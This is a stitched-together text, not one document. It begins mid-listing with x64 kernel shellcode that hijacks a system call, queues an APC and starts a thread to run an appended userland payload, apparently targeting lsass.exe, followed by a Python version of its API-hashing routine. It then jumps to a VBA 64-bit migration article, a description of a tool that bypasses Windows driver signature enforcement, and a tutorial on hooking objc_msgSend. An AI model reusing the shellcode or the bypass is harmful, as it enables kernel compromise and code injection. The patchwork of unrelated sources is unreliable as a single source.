    cmp word [rax+0x48], 0x18
    jne _find_kernel32_dll_loop
    mov rdx, [rax+0x50]
    ; check only "32" because name might be lowercase or uppercase
    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
    jnz _find_kernel32_dll_loop
%endif

    mov r15, [rax+0x20]
    mov edi, CREATETHREAD_HASH
    call get_proc_addr

    ; save CreateThread address to SystemArgument1
    mov [rbx], rax
_kernel_kapc_routine_exit:
    xor ecx, ecx
    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
    ; restore IRQL to APC_LEVEL
    mov cl, 1
    mov cr8, rcx
    pop r15
    pop rsi
    pop rdi
    pop rbx
    pop rbp
    ret

userland_start:
    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
    xor ecx, ecx    ; lpThreadAttributes = NULL
    push rcx        ; lpThreadId = NULL
    push rcx        ; dwCreationFlags = 0
    mov r9, rcx     ; lpParameter = NULL
    lea r8, [rel userland_payload]  ; lpStartAddr
    mov edx, ecx    ; dwStackSize = 0
    sub rsp, 0x20
    call rax
    add rsp, 0x30
    ret

userland_payload:
    ; the userland payload is appended here
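
The calc_hash routine in the listing is a rotate-right-by-13 additive hash over an ASCII string. A minimal Python sketch of the same loop follows; the function names are invented for this example. Note that the assembly tests for the terminator after the rotate and add, so the terminating NUL byte takes part in one final rotation.

```python
def ror32(value, count):
    """Rotate a 32-bit value right by count bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name):
    """Mirror the calc_hash loop: rotate, add the byte, stop after NUL."""
    data = name.encode("ascii") + b"\x00"   # the terminator is processed too
    result = 0
    for byte in data:
        result = ror32(result, 13)
        result = (result + byte) & 0xFFFFFFFF
    return result

if __name__ == "__main__":
    print(hex(ror13_hash("lsass.exe")))
```

If the sketch matches the assembly, hashing "lsass.exe" should in principle reproduce LSASS_EXE_HASH, but that comparison has not been checked here.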

How to convert Windows API declarations in VBA for 64-bit

Compile error message for legacy API declaration

Since Office 2010, all Office applications, including Microsoft Access and VBA, are available in a 64-bit edition in addition to the classic 32-bit edition.

To clear up an occasional misconception: you do not need to install Office/Access as a 64-bit application just because you have a 64-bit operating system. Windows x64 provides an excellent 32-bit subsystem that allows you to run any 32-bit application without drawbacks.

For now, 64-bit Office/Access is still the exception rather than the norm, but this is changing more and more.

Access — 32-bit vs. 64-bit

If you are just focusing on Microsoft Access, there is actually no compelling reason to use the 64-bit edition instead of the 32-bit edition. Rather, the opposite is true. There are several reasons not to use 64-bit Access.

  • Many ActiveX controls that are frequently used in Access development are still not available for 64-bit. Yes, this is still a problem in 2017, more than 10 years after the first 64-bit Windows operating system was released.
  • Drivers/connectors for external systems like ODBC databases and special hardware might not be available, though this should rarely be an issue nowadays. It might still be a factor only if you need to connect to old legacy systems.
  • And finally, Access applications using the Windows API in their VBA code will require some migration work to function properly in an x64-environment.

There is only one benefit of 64-bit Access I’m aware of. When you open multiple forms at the same time that contain a large number of sub-forms, most likely on a tab control, you might run into out-of-memory-errors on 32-bit systems. The basic problem exists with 64-bit Access as well, but it takes much longer until you will see any memory related error.

Unfortunately (in this regard), Access is part of the Office suite, as is Microsoft Excel. For Excel, there actually are use cases for the 64-bit edition. If you use Excel to calculate large data models, e.g. financial risk calculations, you will probably benefit from the additional memory available to a 64-bit application.

So, whether you as an Access developer like it or not, you might be confronted with the 64-bit edition of Microsoft Access because someone in your or your client’s organization decided they will install the whole Office Suite in 64-bit. – It is not possible to mix and match 32- and 64-bit applications from the Microsoft Office suite.

I can’t do anything about the availability of third-party-components, so in this article, I’m going to focus on the migration of Win-API calls in VBA to 64-bit compatibility.

Migrate Windows API-Calls in VBA to 64-bit

Fortunately, the Windows API was completely ported to 64-bit. You will not encounter any function, which was available on 32-bit but isn’t anymore on 64-bit. – At least I do not know of any.

However, I frequently encounter several common misconceptions about how to migrate your Windows API calls. I hope I will be able to debunk them with this text.

But first things first. The very first thing you will encounter when you try to compile an Access application with an API declaration that was written for 32-bit in VBA in 64-bit Access is an error message.

Compile error: The code in this project must be updated for use on 64-bit systems. Please review and update Declare statements and then mark them with the PtrSafe attribute.

This message is pretty clear about the problem, but you need further information to implement the solution.

With the introduction of Access 2010, Microsoft published an article on 32- and 64-bit compatibility in Access. In my opinion, that article was comprehensive and pretty good, but many developers felt it was insufficient.

Just recently there was a new, and in my opinion excellent, introduction to the 64-bit extensions in VBA7 published on MSDN. It actually contains all the information you need. Nevertheless, it makes sense to elaborate on how to apply it to your project.

The PtrSafe keyword

With VBA7 (Office 2010), the new PtrSafe keyword was added to the VBA language. This new keyword can (should) be used in Declare statements for calls to external DLL libraries, like the Windows API.

What does PtrSafe do? It actually does … nothing. Correct, it has no effect on how the code works at all.

The only purpose of the PtrSafe attribute is that you, as the developer, explicitly confirm to the VBA runtime environment that you checked your code to handle any pointers in the declared external function call correctly.

As the data type for pointers is different in a 64-bit environment (more on that in a moment), this actually makes sense. If you just ran your 32-bit API code in a 64-bit context, it would sometimes work. Sometimes it would simply not work. And sometimes it would overwrite and corrupt random areas of your computer’s memory and cause all sorts of random application instability and crashes. These effects would be very hard to trace back to the incorrect API declarations.

For this understandable reason, the PtrSafe keyword is mandatory in 64-bit VBA for each external function declaration made with the Declare statement. The PtrSafe keyword can be used in 32-bit VBA as well, but it is optional there for backward compatibility.

Public Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)

The LongLong type

The data types Integer (16-bit Integer) and Long (32-bit Integer) are unchanged in 64-bit VBA. They are still 2 bytes and 4 bytes in size, and their range of possible values is the same as it was before on 32-bit. This is not only true for VBA but for the whole Windows 64-bit platform. Generic data types retain their original size.

Now, if you want to use a true 64-bit Integer in VBA, you have to use the new LongLong data type. This data type is actually only available in 64-bit VBA, not in the 32-bit version. In context with the Windows API, you will actually use this data type only very, very rarely. There is a much better alternative.

The LongPtr data type

On 32-bit Windows, all pointers to memory addresses are 32-bit Integers. In VBA, we used to declare those pointer variables as Long. On 64-bit Windows, these pointers were changed to 64-bit Integers to address the larger memory space. So, obviously, we cannot use the unchanged Long data type anymore.

In theory, you could use the new LongLong type to declare integer pointer variables in 64-bit VBA code. In practice, you absolutely should not. There is a much better alternative.

Particularly for pointers, Microsoft introduced an all new and very clever data type. The LongPtr data type. The really clever thing about the LongPtr type is, it is a 32-bit Integer if the code runs in 32-bit VBA and it becomes a 64-bit Integer if the code runs in 64-bit VBA.

LongPtr is the perfect type for any pointer or handle in your Declare Statement. You can use this data type in both environments and it will always be appropriately sized to handle the pointer size of your environment.
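
The difference between a fixed 32-bit integer and a pointer-sized integer can also be observed outside VBA. The following Python sketch is only an illustration, not VBA behaviour: `c_int32` stands in for Long, `c_void_p` stands in for LongPtr, and the handle value is invented.

```python
import ctypes

LONG_BITS = ctypes.sizeof(ctypes.c_int32) * 8      # like VBA Long: always 32
POINTER_BITS = ctypes.sizeof(ctypes.c_void_p) * 8  # like VBA LongPtr: 32 or 64

def store_in_long(value):
    """Keep only the low 32 bits, which is all a 32-bit variable can hold."""
    return value & 0xFFFFFFFF

handle = 0x00007FF612345678          # hypothetical 64-bit handle value
truncated = store_in_long(handle)

print(LONG_BITS, POINTER_BITS, hex(truncated))
```

On a 64-bit interpreter the pointer size is reported as 64 bits, and the upper half of the invented handle is lost once it is squeezed into 32 bits, which is the kind of damage a Long-typed pointer would cause.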

Misconception: “You should change all Long variables in your Declare Statements and Type declarations to be LongPtr variables when adapting your code for 64-bit.”


As mentioned above, the size of the existing, generic 32-bit data types has not changed. If an API-Function expected a Long Integer on 32-bit it will still expect a Long Integer on 64-bit.

Only if a function parameter or return value is representing a pointer to a memory location or a handle (e.g. Window Handle (HWND) or Picture Handle), it will be a 64-bit Integer. Only these types of function parameters should be declared as LongPtr.

If you use LongPtr incorrectly for parameters that should be plain Long Integer your API calls may not work or may have unexpected side effects. Particularly if you use LongPtr incorrectly in Type declarations. This will disrupt the sequential structure of the type and the API call will raise a type mismatch exception.

Public Declare PtrSafe Function ShowWindow Lib "user32" (ByVal hWnd As LongPtr, ByVal nCmdShow As Long) As Boolean

The hWnd argument is a handle of a window, so it needs to be a LongPtr. nCmdShow is an int32, it should be declared as Long in 32-bit and in 64-bit as well.

Do not forget a very important detail. Not only your Declare Statement should be written with the LongPtr data type, your procedures calling the external API function must, in fact, use the LongPtr type as well for all variables, which are passed to such a function argument.

VBA7 vs WIN64 compiler constants

Also new with VBA7 are the two compiler constants Win64 and VBA7. VBA7 is true if your code runs in the VBA7 environment (Access/Office 2010 and above). Win64 is true if your code actually runs in the 64-bit VBA environment. Win64 is not true if you run a 32-bit VBA application on a 64-bit system.

Misconception: “You should use the WIN64 compiler constants to provide two versions of your code if you want to maintain compatibility with 32-bit VBA/Access.”


For 99% of all API declarations, it is completely irrelevant if your code runs in 32-bit VBA or in 64-bit VBA.

As explained above, the PtrSafe Keyword is available in 32-bit VBA as well. And, more importantly, the LongPtr data type is too. So, you can and should write API code that runs in both environments. If you do so, you’ll probably never need to use conditional compilation to support both platforms with your code.

However, there might be another problem. If you only target Access (Office) 2010 and newer, my above statement is unconditionally correct. But if your code should run with older versions of Access as well, you do need to use conditional compilation. You still do not need to care about 32/64-bit, though. You need to care about the Access/VBA version your code is running in.

You can use the VBA7 compiler constant to write code for different versions of VBA. Here is an example for that.

Private Const SW_MAXIMIZE As Long = 3

#If VBA7 Then
    Private Declare PtrSafe Function ShowWindow Lib "USER32" _
        (ByVal hwnd As LongPtr, ByVal nCmdShow As Long) As Boolean
    Private Declare PtrSafe Function FindWindow Lib "USER32" Alias "FindWindowA" _
        (ByVal lpClassName As String, ByVal lpWindowName As String) As LongPtr
#Else
    Private Declare Function ShowWindow Lib "USER32" _
        (ByVal hwnd As Long, ByVal nCmdShow As Long) As Boolean
    Private Declare Function FindWindow Lib "USER32" Alias "FindWindowA" _
        (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
#End If

Public Sub MaximizeWindow(ByVal WindowTitle As String)
#If VBA7 Then
    Dim hwnd As LongPtr
#Else
    Dim hwnd As Long
#End If
    hwnd = FindWindow(vbNullString, WindowTitle)
    If hwnd <> 0 Then
        Call ShowWindow(hwnd, SW_MAXIMIZE)
    End If
End Sub

Now, here is a screenshot of that code in the 64-bit VBA-Editor. Notice the red highlighting of the legacy declaration. This code section is marked, but it does not produce any actual error. Due to the conditional compilation, it will never be compiled in this environment.

Syntax error highlighting in x64

When to use the WIN64 compiler constant?

There are situations where you still want to check for Win64. There are some new API functions available on the x64 platform that simply do not exist on the 32-bit platform. So, you might want to use a new API function on x64 and a different implementation on x86 (32-bit).

A good example of this is the GetTickCount function. This function returns the number of milliseconds since the system was started. Its return value is a 32-bit value, declared as Long in VBA. The tick count can only run for 49.7 days before the maximum value of that 32-bit type is reached and it wraps around. To improve this, there is a newer GetTickCount64 function. This function returns a ULONGLONG, a 64-bit unsigned integer. The function is available on 32-bit Windows as well, but we cannot use it there because we have no suitable data type in VBA to handle its return value.

If you want to use the 64-bit version of the function when your code is running in a 64-bit environment, you need to use the Win64 constant.

#If Win64 Then
    Public Declare PtrSafe Function GetTickCount Lib "Kernel32" Alias "GetTickCount64" () As LongPtr
#Else
    Public Declare PtrSafe Function GetTickCount Lib "Kernel32" () As LongPtr
#End If

In this sample, I reduced the platform dependent code to a minimum by declaring both versions of the function as GetTickCount. Only on 64-bit, I use the alias GetTickCount64 to map this to the new version of this function. The “correct” return value declaration would have been LongLong for the 64-bit version and just Long for the 32-bit version. I use LongPtr as return value type for both declarations to avoid platform dependencies in the calling code.
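
The 49.7-day figure for the 32-bit tick count is simple arithmetic, shown here as a short Python calculation (Python is used only as a calculator). Because a VBA Long is signed, a value read into a Long would already turn negative after half that time.

```python
MS_PER_DAY = 24 * 60 * 60 * 1000          # milliseconds in one day

unsigned_wrap_days = 2**32 / MS_PER_DAY   # full 32-bit counter wraps to 0
signed_wrap_days = 2**31 / MS_PER_DAY     # a signed 32-bit value turns negative

print(round(unsigned_wrap_days, 1), round(signed_wrap_days, 1))  # prints: 49.7 24.9
```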

A common pitfall — The size of user-defined types

There is a common pitfall that, to my surprise, is hardly ever mentioned.

Many API-Functions that need a user-defined type passed as one of their arguments expect to be informed about the size of that type. This usually happens either by the size being stored in a member inside the structure or passed as a separate argument to the function.

Frequently developers use the Len-Function to determine the size of the type. That is incorrect, but it works on the 32-bit platform — by pure chance. Unfortunately, it frequently fails on the 64-bit platform.

To understand the issue, you need to know two things about Windows’ inner workings.

  1. The members of user-defined types are aligned sequentially in memory. One member after the other.
  2. Windows manages its memory in small chunks. On a 32-bit system, these chunks are always 4 bytes big. On a 64-bit system, these chunks have a size of 8 bytes.

If several members of a user-defined type fit into such a chunk completely, they will be stored in just one of those. If a part of such a chunk is already filled and the next member in the structure will not fit in the remaining space, it will be put in the next chunk and the remaining space in the previous chunk will stay unused. This process is called padding.

Regarding the size of user-defined types, the Windows API expects to be told the complete size the type occupies in memory. Including those padded areas that are empty but need to be considered to manage the total memory area and to determine the exact positions of each of the members of the type.

The Len-Function adds up the size of all the members in a type, but it does not count the empty memory areas, which might have been created by the padding. So, the size computed by the Len-Function is not correct! — You need to use the LenB-Function to determine the total size of the type in memory.

Here is a small sample to illustrate the issue:

Public Type smallType
    a As Integer
    b As Long
    x As LongPtr
End Type

Public Sub testTypeSize()
    Dim s As smallType
    Debug.Print "Len: " & Len(s)
    Debug.Print "LenB: " & LenB(s)
End Sub

On 32-bit the Integer is two bytes in size but it will occupy 4 bytes in memory because the Long is put in the next chunk of memory. The remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 10 bytes, but the whole type is 12 bytes in memory.

On 64-bit the Integer and the Long are 6 bytes total and will fit into the first chunk together. The LongPtr (now 8 bytes in size) will be put into the next chunk of memory and once again the remaining two bytes in the first chunk of memory are not used. The size of the members adds up to 14 bytes, but the whole type is 16 bytes in memory.

So, if the underlying mechanism exists on both platforms, why is this not a problem with API calls on 32-bit? — Simply by pure chance. To my knowledge, there is no Windows API function that explicitly uses a datatype smaller than a DWORD (Long) as a member in any of its UDT arguments.
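
The same padding effect can be reproduced with a C-compatible structure in Python’s ctypes module. This is a sketch for comparison, not VBA: the structure name and field mapping are assumptions (`c_int16` for Integer, `c_int32` for Long, `c_void_p` for LongPtr). The sum of the member sizes plays the role of Len, and the size of the whole structure plays the role of LenB.

```python
import ctypes

class SmallType(ctypes.Structure):
    # Field order mirrors the smallType sample.
    _fields_ = [
        ("a", ctypes.c_int16),   # stands in for VBA Integer (2 bytes)
        ("b", ctypes.c_int32),   # stands in for VBA Long (4 bytes)
        ("x", ctypes.c_void_p),  # stands in for VBA LongPtr (4 or 8 bytes)
    ]

member_sum = sum(ctypes.sizeof(ftype) for _, ftype in SmallType._fields_)
total_size = ctypes.sizeof(SmallType)

print("sum of members:", member_sum)
print("size in memory:", total_size)
```

On a 64-bit interpreter this reports 14 and 16, on a 32-bit interpreter 10 and 12, matching the numbers given for the VBA type.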

Wrap up

With the content covered in this article, you should be able to adapt most of your API-Declarations to 64-bit.

Many samples and articles on this topic available on the net today are lacking sufficient explanation to highlight the really important issues. I hope I was able to show the key facts for a successful migration.

Always keep in mind, it is actually not that difficult to write API code that is ready for 64-bit. — Good luck!

A Tool To Bypass Windows x64 Driver Signature Enforcement

TDL (Turla Driver Loader) For Bypassing Windows x64 Signature Enforcement

Definition: TDL Driver loader allows bypassing Windows x64 Driver Signature Enforcement.

What are the system requirements and limitations?

It runs on x64 Windows 7/8/8.1/10.
Vista is obsolete, so TDL does not support it; TDL is designed only for x64 Windows.
Administrator privileges are required.
Loaded drivers MUST BE specially designed to run as "driverless".
There is no SEH support.
There is no driver unloading.
Only ntoskrnl imports are resolved automatically; everything else is up to you.
It also provides dummy driver examples.

Differences between DSEFix and TDL:

Both DSEFix and TDL take advantage of a driver exploit, but they use it in entirely different ways.

Benefits of DSEFix: 

It manipulates kernel variable called g_CiEnabled (Vista/7, ntoskrnl.exe) and/or g_CiOptions (8+. CI.DLL).
DSEFix is simple: you only need to turn DSE off and load your driver; nothing else is required.
DSEFix is a potential BSOD generator, as it is subject to PatchGuard (KPP) protection.

Advantages of TDL:

It is friendly to PatchGuard as it doesn’t patch any kernel variables.
The shellcode that TDL uses can map a driver into kernel mode without the Windows loader.
A non-invasive bypass of DSE is the main advantage of TDL.

There are some disadvantages too:

Your driver must be specially created to run as "driverless".
The driver must exist in kernel mode as an executable code buffer.
You can load multiple drivers only as long as they do not conflict with each other.


TDL comes with full source code. To build it you need Microsoft Visual Studio 2015 U1 or later. Driver builds additionally require Microsoft Windows Driver Kit 8.1.


Tracing Objective-C method calls

Linux has this great tool called strace, on OSX there’s a tool called dtruss — based on dtrace. Dtruss is great in functionality, it gives pretty much everything you need. It is just not as nice to use as strace. However, on Linux there is also ltrace for library tracing. That is arguably more useful because you can see much more granular application activity. Unfortunately, there isn’t such a tool on OSX. So, I decided to make one — albeit a simpler version for now. I called it objc_trace.

Objc_trace’s functionality is quite limited at the moment. It will print out the name of the method, the class and a list of parameters to the method. In the future it will be expanded to do more things, however just knowing which method was called is enough for many debugging purposes.

Something about the language

Without going into too much detail let’s look into the relevant parts of the Objective-C runtime. This subject has been covered pretty well by the hacker community. In Phrack there is a great article covering various internals of the language. However, I will scratch the surface to review some aspects that are useful for this context.

The language is incredibly dynamic. While still backwards compatible to C (or C++), most of the code is written using classes and methods a.k.a. structures and function pointers. A class is exactly what you’re thinking of. It can have static or instance methods or fields. For example, you might have a class Book with a method Pages that returns the contents. You might call it this way:

	Book* book = [[Book alloc] init];
	Page* pages = [book Pages];

The alloc function is a static method while the others (init and Pages) are dynamic. What actually happens is that the system sends messages to the object or the static class. The message contains the class name, the instance, the method name and any parameters. The runtime will resolve which compiled function actually implements this method and call that.

If anything above doesn’t make sense you might want to read the referenced Phrack article for more details.

Message passing is great, though there are all kinds of efficiency considerations in play. For example, methods that you call will eventually get cached so that the resolution process occurs much faster. What’s important to note is that there is some smoke and mirrors going on.

The system is actually not sending messages under the hood. What it is doing is routing the execution using a single library call: objc_msgSend [1]. This is due to how the concept of a message is implemented under the hood.

	id objc_msgSend(id self, SEL op, ...)

Let’s take ourselves out of the Objective-C abstractions for a while and think about how things are implemented in C. When a method is called, the stack and the registers are configured for the objc_msgSend call. The id type is kind of like a void * but restricted to Objective-C class instances. The SEL type is actually a char* and refers to selectors, more specifically the method names (which include parameters). For example, a method that takes two parameters will have a selector that might look something like this: createGroup:withCapacity:. Colons signal that there should be a parameter there. Really quite confusing but we won’t dwell on that.

The useful part is that a selector is a C-String that contains the method name and its named parameters. A non-obfuscating compiler does not remove them because the names are needed to resolve the implementing function.

Shockingly, the function that implements the method takes in two extra parameters ahead of the user defined parameters. Those are the self and the op. If you look at the disassembly, it looks something like this (taken from Damn Vulnerable iOS App):

__text:100005144 ; YapDatabaseViewState - (id)createGroup:(id) withCapacity:(uint64_t)
__text:100005144 ; Attributes: bp-based frame
__text:100005144 ; id __cdecl -[YapDatabaseViewState createGroup:withCapacity:]
                        ;         (struct YapDatabaseViewState *self, SEL, id, uint64_t)
__text:100005144 __YapDatabaseViewState_createGroup_withCapacity__

Notice that the C function is called __YapDatabaseViewState_createGroup_withCapacity__, the method is called createGroup and the class is YapDatabaseViewState. It takes two parameters: an id and a uint64_t. However, it also takes a struct YapDatabaseViewState *self and a SEL. This signature essentially matches the signature of objc_msgSend, except that the latter has variadic parameters.

The existence and the location of the extra parameters is not accidental. The reason for this is that objc_msgSend will actually redirect execution to the implementing function by looking up the selector to function mapping within the class object. Once it finds the target it simply jumps there without having to readjust the parameter registers. This is why I referred to this as a routing mechanism, rather than message passing. Of course, I say that due to the implementation details, rather than the conceptual basis for what is happening here.
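To make the routing idea more tangible, here is a toy model in plain C. It is only a sketch of the concept and not how the Objective-C runtime is implemented: all names (toy_class, toy_object, toy_msg_send, book_add_pages) are invented for this illustration, the lookup is a linear search with no cache, and the real objc_msgSend jumps to the implementation instead of calling it.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical miniature of the routing idea: every implementation takes
   (self, op) ahead of its own parameter, like the real ones do. */
typedef long (*imp_t)(void *self, const char *op, long arg);

typedef struct {
    const char *selector;  /* method name, e.g. "addPages:" */
    imp_t       imp;       /* function implementing it */
} method_entry;

typedef struct {
    const char         *name;
    const method_entry *methods;
    size_t              method_count;
} toy_class;

typedef struct {
    const toy_class *isa;  /* the object starts with its class pointer */
    long             pages;
} toy_object;

static long book_add_pages(void *self, const char *op, long n) {
    (void)op;
    toy_object *book = self;
    book->pages += n;
    return book->pages;
}

static const method_entry book_methods[] = {
    { "addPages:", book_add_pages },
};

static const toy_class book_class = { "Book", book_methods, 1 };

/* Look up the selector in the receiver's class and forward the untouched
   arguments to the implementation; returns 0 for nil or unknown selectors. */
static long toy_msg_send(void *self, const char *op, long arg) {
    assert(op != NULL);
    if (self == NULL) return 0;
    const toy_class *cls = ((toy_object *)self)->isa;
    for (size_t i = 0; i < cls->method_count; i++) {
        if (strcmp(cls->methods[i].selector, op) == 0)
            return cls->methods[i].imp(self, op, arg);
    }
    return 0;
}
```

Because the implementation receives exactly the arguments that the router received, the router never has to rearrange anything, which is the property the hook relies on.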

Quite smart actually, because this allows the language to be very dynamic in nature i.e. I can remap SEL to Function mapping and change the implementation of any particular method. This is also great for reverse engineering because this system retains a lot of the labeling information that the developer puts into the source code. I quite like that.

The plan

Now that we’ve seen how Objective-C makes method calls, we notice that objc_msgSend becomes a choke point for all method calls. It is like a hub in a poorly set up network with a great many users. So, in order to get a list of every method called all we have to do is watch this function. One way to do this is via a debugger such as LLDB or GDB. However, the trouble is that a debugger is fairly heavy and mostly interactive. It’s not really good when you want to capture a run or watch the process to pinpoint a bug. Also, the performance hit might be too much. For more offensive work, you can’t embed one of those debuggers into a lightweight implant.

So, what we are going to do is hook the objc_msgSend function on an ARM64 iOS Objective-C program. This will allow us to specify a function to get called before objc_msgSend is actually executed. We will do this on a Jailbroken iPhone — so no security mechanism bypasses here, the Jailbreak takes care of all of that.

Figure 1: Patching at high level

On the high level the hooking works something like this. objc_msgSend instructions are modified in the preamble to jump to another function. This other function will perform our custom tracing features, restore the CPU state and return to a jump table. The jump table is a dynamically generated piece of code that will execute the preamble instructions that we’ve overwritten and jump back to objc_msgSend to continue with normal execution.


The implementation of the technique presented can be found in the objc_trace repository.

The first thing we are going to do is allocate what I call a jump page. It is called so because this memory will be a page of code that jumps back to continue executing the original function.

s_jump_page* t_func = 
   (s_jump_page*)mmap(NULL, 4096, 
    		PROT_READ | PROT_WRITE,   // assumed protection; the page must be executable before it is used
    		MAP_ANON  | MAP_PRIVATE, -1, 0);

Notice that the type of the jump page is s_jump_page which is a structure that will represent our soon to be generated code.

typedef struct {
    instruction_t     inst[4];    
    s_jump_patch jump_patch[5];
    instruction_t     backup[4];    
} s_jump_page;

The s_jump_page structure contains four instructions that we overwrite (think back to the diagram at step 2). We also keep a backup of these instructions at the end of the structure; this is not strictly necessary, but it makes for easier unhooking. Then there are five structures called jump patches. These are special sets of instructions that will redirect the CPU to an arbitrary location in memory. Jump patches are also represented by a structure.

typedef struct {
    instruction_t i1_ldr;
    instruction_t i2_br;
    address_t jmp_addr;
} s_jump_patch;

Using these structures we can build a very elegant and transparent mechanism for building dynamic code. All we have to do is create an inline assembly function in C and cast it to the structure.

void d_jump_patch() {
    __asm__ __volatile__(
        // trampoline to somewhere else.
        "ldr x16, #8;\n"
        "br x16;\n"
        ".long 0;\n" // place for jump address
        ".long 0;\n"
    );
}

This is ARM64 Assembly to load a 64-bit value from address PC+8 then jump to it. The .long placeholders are places for the target address.
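For readers without an ARM64 toolchain at hand, the same sixteen bytes can also be produced from the raw instruction encodings. This is a sketch and not the approach objc_trace takes: encode_jump_patch and the two macro names are hypothetical, the constants are the standard A64 encodings of the two instructions, and a little-endian host is assumed so that memcpy lays the words out the way an ARM64 CPU expects them. The code only generates the bytes; it does not execute them.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* A64 encodings of the two trampoline instructions. */
#define A64_LDR_X16_PC8 0x58000050u  /* ldr x16, #8 */
#define A64_BR_X16      0xD61F0200u  /* br  x16     */

/* Hypothetical helper: writes the 16-byte patch (two instructions followed
   by the 64-bit target address) into buf. */
static void encode_jump_patch(uint8_t buf[16], uint64_t target) {
    assert(buf != NULL);
    uint32_t ldr = A64_LDR_X16_PC8;
    uint32_t br  = A64_BR_X16;
    memcpy(buf + 0, &ldr, sizeof ldr);       /* loads the word at PC+8 */
    memcpy(buf + 4, &br, sizeof br);         /* jumps to it */
    memcpy(buf + 8, &target, sizeof target); /* the two .long placeholders */
}
```

The layout mirrors s_jump_patch: two 4-byte instructions followed by an 8-byte address, 16 bytes in total.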

s_jump_patch* jump_patch(){
    return (s_jump_patch*)d_jump_patch;
}

In order to use this we simply cast the code i.e. the d_jump_patch function pointer to the structure and set the value of the jmp_addr field. This is how we implement the function that generates the custom trampoline.

void write_jmp_patch(void* buffer, void* dst) {
    // returns the pointer to d_jump_patch.
    s_jump_patch patch = *(jump_patch());

    patch.jmp_addr = (address_t)dst;

    *(s_jump_patch*)buffer = patch;
}

We take advantage of the C compiler automatically copying the entire size of the structure instead of using memcpy. In order to patch the original objc_msgSend function we use write_jmp_patch function and point it to the hook function. Of course, before we can do that we copy the original instructions to the jump page for later execution and back up.

    //   Building the Trampoline
    *t_func = *(jump_page());
    // save first 4 32bit instructions
    //   original -> trampoline
    instruction_t* orig_preamble = (instruction_t*)o_func;
    for(int i = 0; i < 4; i++) {
        t_func->inst  [i] = orig_preamble[i];
        t_func->backup[i] = orig_preamble[i];
    }

Now that we have saved the original instructions from objc_msgSend we have to be aware that we’ve copied four instructions. A lot can happen in four instructions, all sorts of decisions and branches. In particular I’m worried about branches because they can be relative. So, what we need to do is validate that t_func->inst doesn’t have any branches. If it does, they will need to be modified to preserve functionality.

This is why s_jump_page has five jump patches:

  1. All four instructions are non branches, so the first jump patch will automatically redirect execution to objc_msgSend+16 (skipping the patch).
  2. There are up to four branch instructions, so each of the jump patches will be used to redirect to the appropriate offset into objc_msgSend.

Checking for branch instructions is a bit tricky. ARM64 is a RISC architecture and does not present the same variety of instructions as, say, x86-64. But, there are still quite a few [2].

  1. Conditional Branches:
    • B.cond label jumps to PC relative offset.
    • CBNZ Wn|Xn, label jumps to PC relative offset if Wn is not equal to zero.
    • CBZ Wn|Xn, label jumps to PC relative offset if Wn is equal to zero.
    • TBNZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is not zero.
    • TBZ Xn|Wn, #uimm6, label jumps to PC relative offset if bit number uimm6 in register Xn is zero.
  2. Unconditional Branches:
    • B label jumps to PC relative offset.
    • BL label jumps to PC relative offset, writing the address of the next sequential instruction to register X30. Typically used for making function calls.
  3. Unconditional Branches to register:
    • BLR Xm unconditionally jumps to address in Xm, writing the address of the next sequential instruction to register X30.
    • BR Xm jumps to address in Xm.
    • RET {Xm} jumps to register Xm.

We don’t particularly care about category three because register state should not be influenced by our hooking mechanism. However, categories one and two are PC relative and therefore need to be updated if found in the preamble.

So, I wrote a function that updates the instructions. At the moment it only handles a subset of cases, specifically the B.cond and B instructions. The former is found in objc_msgSend.

__text:18DBB41C0  EXPORT _objc_msgSend
__text:18DBB41C0   _objc_msgSend 
__text:18DBB41C0     CMP             X0, #0
__text:18DBB41C4     B.LE            loc_18DBB4230
__text:18DBB41C8   loc_18DBB41C8
__text:18DBB41C8     LDR             X13, [X0]
__text:18DBB41CC     AND             X9, X13, #0x1FFFFFFF8

Now, I don’t know about you but I don’t particularly like to use complicated bit-wise operations to extract and modify data. It’s kind of fun to do so, but it is also fragile and hard to read. Luckily for us, C was designed to work at such a low level. Each ARM64 instruction is four bytes and so we use bit fields in C structures to deal with them!

typedef struct {
    uint32_t offset   : 26;
    uint32_t inst_num : 6;
} inst_b;

This is the unconditional PC relative jump.

typedef struct {
    uint32_t condition: 4;
    uint32_t reserved : 1;
    uint32_t offset   : 19;
    uint32_t inst_num : 8;
} inst_b_cond;

And this one is the conditional PC relative jump. Back in the day, I wrote a plugin for IDA Pro that gives the details of the instruction under the cursor. It is called IdaRef and, for it, I produced an ASCII text file that has all the instructions and their bit fields clearly written out [3]. So the B.cond looks like this in memory. Notice the right to left bit numbering.

31 30 29 28 27 26 25 24 | 23 ............ 5 | 4 | 3 ..... 0
 0  1  0  1  0  1  0  0 |       imm19       | 0 |   cond

That is what we map our inst_b_cond structure to. Doing so allows us very easy abstraction over bit manipulation.

void check_branches(s_jump_page* t_func, instruction_t* o_func) {
    ...
        instruction_t inst = t_func->inst[i];
        inst_b*       i_b      = (inst_b*)&inst;
        inst_b_cond*  i_b_cond = (inst_b_cond*)&inst;

        ...
        } else if(i_b_cond->inst_num == 0x54) {
            // conditional branch

            // save the original branch offset
            branch_offset = i_b_cond->offset;
            i_b_cond->offset = patch_offset;

            // set jump point into the original function, 
            //   don't forget that it is PC relative
            t_func->jump_patch[use_jump_patch].jmp_addr = 
                (address_t)(o_func + branch_offset + i);
            ...
        }
    ...
}

With some important details removed, I’d like to highlight how we are checking the type of the instruction by overlaying the structure over the instruction integer and checking to see if the value of the instruction number is correct. If it is, then we use that pointer to read the offset and modify it to point to one of the jump patches. In the patch we place the absolute value of the address where the instruction would’ve jumped were it still back in the original objc_msgSend function. We do so for every branch instruction we might encounter.

Once the jump page is constructed we insert the patch into objc_msgSend and complete the loop. The most important thing is, of course, that the hook function restores all the registers to the state just before CPU enters into objc_msgSend otherwise the whole thing will probably crash.

It is important to note that at the moment we require that the function to be hooked has to be at least four instructions long because that is the size of the patch. Other than that we don’t even care if the target is a proper C function.

